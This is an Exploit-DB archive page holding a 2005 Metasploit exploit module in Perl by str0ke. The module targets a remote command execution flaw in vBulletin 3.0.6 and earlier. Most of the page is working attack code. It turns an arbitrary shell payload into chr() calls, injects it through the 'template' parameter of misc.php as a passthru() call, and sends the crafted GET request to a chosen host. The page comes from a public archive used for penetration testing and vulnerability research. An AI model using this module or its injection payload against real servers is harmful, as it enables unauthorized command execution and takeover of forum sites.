vBulletin 3.0.6 - 'template' Command Execution (Metasploit)

EDB-ID:

1133

CVE:

N/A

EDB Verified:

Author:

str0ke

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2005-08-03

Vulnerable App: 
##
#        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#    Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#         Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     http://metasploit.com/projects/Framework for more information.
##

package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
        'Name'     => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
        'Version'  => '$Revision: 1.0 $',
        'Authors'  => [ 'str0ke' ],
        'Arch'     => [ ],
        'OS'       => [ ],
        'Priv'     => 0,
        'UserOpts' =>
          {
                'RHOST' => [1, 'ADDR', 'The target address'],
                'RPORT' => [1, 'PORT', 'The target port', 80],
                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
                'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
                'SSL'   => [0, 'BOOL', 'Use SSL'],
          },

        'Description' => Pex::Text::Freeform(qq{
                This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

        'Refs' =>
          [
                ['MIL', '832'],
          ],

        'Payload' =>
          {
                'Space' => 512,
                'Keys'  => ['cmd', 'cmd_bash'],
          },

        'Keys' => ['vBulletin'],
  };

sub new {
        my $class = shift;
        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
        return($self);
}

sub Exploit {
        my $self = shift;
        my $target_host    = $self->GetVar('RHOST');
        my $target_port    = $self->GetVar('RPORT');
        my $vhost          = $self->GetVar('VHOST') || $target_host;
        my $path           = $self->GetVar('RPATH');
        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

        # Encode the command as a set of chr() function calls
        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

        # Create the get request data
        my $data = "?do=page&template={\${passthru($byte)}}";

        my $req =
                "GET $path$data HTTP/1.1\r\n".
                "Host: $vhost:$target_port\r\n".
                "Content-Type: application/html\r\n".
                "Content-Length: ". length($data)."\r\n".
                "Connection: Close\r\n".
                "\r\n";

        my $s = Msf::Socket::Tcp->new(
                'PeerAddr'  => $target_host,
                'PeerPort'  => $target_port,
                'LocalPort' => $self->GetVar('CPORT'),
                'SSL'       => $self->GetVar('SSL'),
          );

        if ($s->IsError){
                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
                return;
        }

        $self->PrintLine("[*] Sending the malicious vBulletin Get request...");

        $s->Send($req);

        my $results = $s->Recv(-1, 20);
        $s->Close();

        return;
}

1;

# milw0rm.com [2005-08-03]
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services